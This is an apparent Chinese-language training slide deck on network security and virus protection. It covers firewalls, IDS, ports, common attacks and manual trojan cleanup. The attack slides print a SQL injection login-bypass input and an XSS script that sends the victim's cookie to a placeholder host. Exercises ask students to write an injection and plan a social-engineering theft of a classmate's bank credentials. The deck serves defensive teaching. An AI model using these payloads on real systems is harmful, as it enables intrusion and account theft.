网管寒训网路安全与病毒防护

喇賽時間為什麼要談資訊安全?近來發生的問題今日作業2021/4/211網路安全2021/4/212網路安全基本介紹網路安全的基本需求網路面臨的問題網路的安全威脅2021/4/213網路安全的基本需求傳輸的保密性(confidentiality)資料的完整性(integrity)身分的鑑別與認證(authentication)雙方的不可否認性(nonrepudiation)2021/4/214網路面臨的問題病毒蠕蟲攻擊網路癱瘓垃圾郵件機密外洩非法入侵即時通訊(MSN….)back2021/4/215網路的安全威脅系統、漏洞不斷被發現，攻擊手法不斷翻新更新的速度永遠比不過感染的速度病毒變種快速攻擊程式及後門程式氾濫廣告郵件、垃圾訊息及色情網站充斥整個網路非法下載即時通訊2021/4/216隨堂練習請從網路找出一個近年來的網路攻擊事件的新聞，並簡單判別它是以上提到的哪種問題?2021/4/217提高網路連線的安全性資料加密(DataEncryption)

明文(plaintext)密文(ciphertext)認證(Authorization)

通常是要求使用者輸入帳號密碼權限設定(Authentication)稽核(Auditing)

提供過去事件的相關紀錄利於事後追蹤

2021/4/218典型密碼系統發送方接收方加密演算法解密演算法加密金鑰解密金鑰明文密文明文2021/4/219網路安全設備入侵防禦系統(IPS&IDS)防火牆（Firewall)防毒系統(Anti-Virus)2021/4/2110Firewall安裝在兩個網路間的裝置藉著過濾掉某些不可靠的資料封包來增加系統的安全性提供稽核與控制存取等服務2021/4/2111Firewall的基本功能認證(UA,UserAuthentication)預警功能(Alert)記錄與記錄分析工具(Log&LogAnalyzer)通訊埠的權限設定2021/4/2112Firewall的缺點易形成網路上的交通瓶頸無法防止內部網路的使用者用其合法的身分做破壞系統的行為不一定能阻止開後門無法有效阻止有心人士利用原作業系統的漏洞進行入侵破壞行為不提供資料完整性驗證2021/4/2113三大Firewall類型1.封包過濾式2.應用層閘道式3.電路層閘道式2021/4/2114封包過濾式防火牆應用於網路層針對每個封包的標頭提供的資訊加以查核優點：1.完全通透性2.速度快缺點：1.無法有效防止IP欺騙2.有些應用協議不適用(EX.HTTP)2021/4/2115隨堂練習1.請去網路上找出另外兩種防火牆的簡介，並列出兩種防火牆的優缺點2.請完成以下表格封包過濾式應用層閘道式電路層閘道式運作層級運作效率通透性安全性建置價格2021/4/2116防火牆Comodo個人防火牆personalfirewallodoMcAfeePersonalFirewall2021/4/2117入侵偵測系統IDS架設在網路節點與主機間的針孔攝影機若防火牆是第一道防線IDS就是第二道防線可以監控用戶和系統的所有活動將封包拆開分析再重新組合2021/4/2118隨堂練習使用IDS是否真的萬無一失?請查閱網路資料並列出IDS的缺點2021/4/2119防毒軟體以特徵碼和行為模式辨別病毒、木馬並不能100%阻擋病毒的入侵(因為病毒變種過於快速)不怕一萬，只怕萬一定期更新病毒碼、主程式2021/4/2120網路的基本運作原理Internet世界

TCP/IP協定WindowsPort80Port110Port25Port??…2021/4/2121Port的角色與功能電腦進出Internet的大門一般來說，每個網路軟體都可以打開任一個Port，但為了傳輸順暢，某些軟體就會固定使用某幾個Port所以沒用到、不常用的幾個Port就容易成為駭客入侵最常使用的Port2021/4/2122隨堂練習請找出以下幾個程式或協定所使用的Port1.FTP6.HTTP2.Telnet7.DHCP3.SMTP4.POP35.網路芳鄰2021/4/2123駭客入侵2021/4/2124駭客入侵的對象Server個人!!!2021/4/2125常見的攻擊手法(Server)猜密碼利用系統的程式漏洞『主動』攻擊利用程式功能的『被動』攻擊rootkit→蠕蟲或木馬社交工程DoS(DenialofService)XSS(Cross-SiteScripting)2021/4/2126猜密碼取得帳號資訊後猜密碼

常見帳號admin,administrator,webmaster…Bruteforce(暴力法)

利用字典檔進行無數次試驗2021/4/2127猜密碼初級cracker會使用的方式之一WINRARpasswordrecovery費時防護：1.建立較嚴格的密碼設定規則2.密碼輸入次數限制

back

2021/4/2128利用系統的程式漏洞『主動』攻擊軟體撰寫方式的問題

bug(可能會造成系統的不穩定或當機)

Security(程式碼撰寫方式會導致系統的使用權限被惡意者所掌握)cracker會嘗試撰寫一些針對這個漏洞的攻擊程式→攻擊者只要拿到攻擊程式就可以進行攻擊

SQLinjection

2021/4/2129SQLinjection(資料隱碼)利用使用者輸入的東西來控制你的SQLExample:select*frommemberwhereUID='

"&request("ID")&"

'

AndPasswd='"&request("Pwd")&"‘正常：select*frommemberwhereUID='A123456789'

AndPasswd='1234‘2021/4/2130SQLinjection

使用者帳號’or1=1--，密碼隨便打結果：select*frommemberwhereUID=''or1=1--'

AndPasswd='asdf1234'邏輯成立跳過驗證密碼過程(p.s.--符號後的任何敘述都會被當作註解

)2021/4/2131隨堂練習請運用剛剛所提到的內容寫出一段資料隱碼攻擊的程式碼2021/4/2132利用系統的程式漏洞『主動』攻擊最常見不需要猜密碼由攻擊開始到取得你系統的root權限不需要兩分鐘，就能夠立刻入侵成功防護：1.關閉不需要的網路服務&Port2.隨時保持更新

back2021/4/2133利用程式功能的『被動』攻擊惡意網站提供軟體下載與安裝瀏覽器主動的答應對方WWW主機所提供的各項程式功能，或者是自動安裝來自對方主機的軟體瀏覽器漏洞讓對方得以傳送惡意程式碼給你的主機來執行

ActiveX主動式內容(IEcore)：

EX.讀寫檔案、病毒掃瞄等

但是有讓對方網站控制本機的危險

2021/4/2134利用程式功能的『被動』攻擊防護：1.隨時更新2.讓瀏覽器在安裝軟體時，要通過你的確認後才安裝3.不要連上惡意網站

(難!!)

back2021/4/2135rootkit→蠕蟲或木馬蠕蟲(Worm)惡性程式碼感染整個網路木馬間諜程式(Trojan)附著在可執行檔案裡開後門爽(側錄、跳板、破壞….)Rootkit即為取得root權限的工具包途徑：漏洞與社交工程…..等2021/4/2136社交工程(SocialEngineering)簡介過人與人的互動來達到『入侵』的目的偽裝、謊言時間可能長以年計釣魚法推薦書目：藍色駭客(出版社：皇冠文化)

MSNphoto系列病毒2021/4/2137社交工程(SocialEngineering)防護：1.帳號密碼記在腦子裡不要說2.不要隨便相信他人(?)3.追蹤對談者back2021/4/2138隨堂練習情境題：如果你是一個駭客，你會怎樣利用社交工程來騙取現在坐在你旁邊同學的郵局帳號密碼?(請用50~100字簡單敘述流程)2021/4/2139DoS(DenialofService)阻斷式攻擊SYN：當主機接收了一個帶有SYN的TCP封包之後，就會啟用對方要求的port來等待連線SYNflood：透過軟體功能，在短短的時間內持續發送出SYN封包，Server就會持續不斷的發送確認封包，並且開啟大量的port在空等CPU使用率飆高、頻寬被吃光掰機關槍打坦克2021/4/2140補充:三方交握(Three-WayHandshaking)Client端發出連線要求時，必須要提供下列資訊：

Client自己的IP位址所使用的Port號最大容許的TCPSegment大小其他訊息三方交握：1.Clioent想要與Server連線，因此Host1將SYN旗標設定為1，同時將目前的Segment序號(x)傳送給Host2。

2.Server接收到此要求後，會對此連線要求加以回應，因此將SYN設定為1，此外附上目前序號(y)，及確認序號(x+1)給Client。（在此，確認號碼為發送端序號加一）。3.Client收到此訊號後，會將序號設定為(x+1)，然後確認序號設定為(y+1)。（確認序號仍為對方的序號加一）。2021/4/21412021/4/21422021/4/2143DDoS(DistributedDenialofService)進化版集合眾人之力先散播惡意軟體(透過後門等方式)同步所有攻擊程式，於同時間朝同目標攻擊效率為DoS的數倍單純惡意行為(不是為了取得root)目前無較好方法防堵2021/4/2144back2021/4/2145Cross-SiteScripting(XSS)跨站腳本攻擊十大攻擊之首利用網站上允許使用者輸入字元或字串的欄位插入HTML與Script語言

利用釣魚式攻擊

將使用者的cookie資料導入到駭客網站並儲存

無名小站(2006)2021/4/2146Cross-SiteScripting(XSS)EX.<script>location.replace('xxx/?secret='+document.cookie)</script>防護1.BlackList缺點：過濾不乾淨2.WhiteList缺點：Client變化性少2021/4/2147隨堂練習請從網路上找出一種阻斷式攻擊的方法(講義上沒提到的)2021/4/2148病毒與木馬防護2021/4/2149木馬??2021/4/2150木馬病毒傻傻分不清楚病毒─進入電腦中進行軟硬體的損壞、無法操作等破壞行為木馬─進入電腦中蒐集各種資訊，甚至完全控制寄主2021/4/2151木馬的功用遠端遙控轉向入侵(or跳板)截取封包獲得帳號密碼DDoS2021/4/2152木馬怎麼防?最佳方式─不要讓它植入你的電腦不幸中了怎麼辦?1.想辦法清除2.利用之前的備份重灌2021/4/2153簡易中毒自救法1.先拔網路線2.使用防毒軟體檢察3.檢查開機自動執行與系統服務4.檢查已執行的程式5.查看Port連線情況6.上網求救---------------------------------------------------------------進階：監控封包2021/4/2154使用防毒軟體檢察平時就要定期更新病毒碼防毒軟體只是疫苗，不一定是解藥

p.s.Spybot–Search&Destroy2021/4/2155檢查開機自動執行1.啟動資料夾2021/4/2156檢查開機自動執行2.Win.ini或是System.ini在Windows的資料夾裡Win.ini通常不會有任何的run和load參數System.ini裡的shell參數的Explorer.exe不會有別的程式名稱2021/4/2157檢查開機自動執行3.檢察機碼(Registry)執行regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce通常只有系統運行所需之程式或是自己灌的應用程式Startupmlin/files/StartupCPL.zip2021/4/2158HKEY_USERS\S-1-5-21-..........\Software\Microsoft\WindowNT\CurrentVersion\Windows裡面通常沒有run的機碼HKEY_LOCAL_Machine\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon裡面的Shell機碼值應該只有explorer.exe2021/4/2159檢察系統服務控制台系統服務停用可疑或自己不認識的服務2021/4/2160檢查已執行的程式工作管理員TaskInfo(共享軟體)可以上網查不知道是什麼的程式neuber/taskmanager/process/index.htmlprocesslibrary/directory/一些WinXP的系統程式：

smss.exelsass.execsrss.exewinlogon.exeExplore.exeregsvc.exesvchost.exe(會有很多個)進入安全模式將可疑執行檔刪除2021/4/2161查看Port狀況CurrPortnirsoft/utils/cports.html將可疑程式的位置鎖定後刪除2021/4/2162隨堂作業請去網路上找出以下幾個程式的發行公司及用途alg.exemplayerc.exeWinMgmt.exewmiprvse.exeInternat.exedaemon.exepdesk.exe2021/4/2163上網求救各大防毒公司網頁pttAntiVirus板2021/4/2164隨身碟病毒利用隨身碟插入時，電腦自動執行的功能執行木馬安裝程式變種異常迅速防護：關閉自動執行改用檔案總管開啟隨身碟WowUSBProtector/~ant/wordpress/?p=10082021/4/2165隨堂練習請查出關閉自動執行的機碼2021/4/2166結論網路很可怕做好防護措施快樂上網2021/4/2167作好系統帳號安全管理系統的第一道防線密碼就像牙刷-天天要用，而且要常常換拒用weakpassword2021/4/2168系統安全漏洞防護留意來自網路上及軟體廠商的系統安全漏洞報告定期Windowsupdate(自動執行)應用程式版本更新2021/4/2169安裝安全防護程式防毒防火牆定期更新病毒碼及掃描port掃描2021/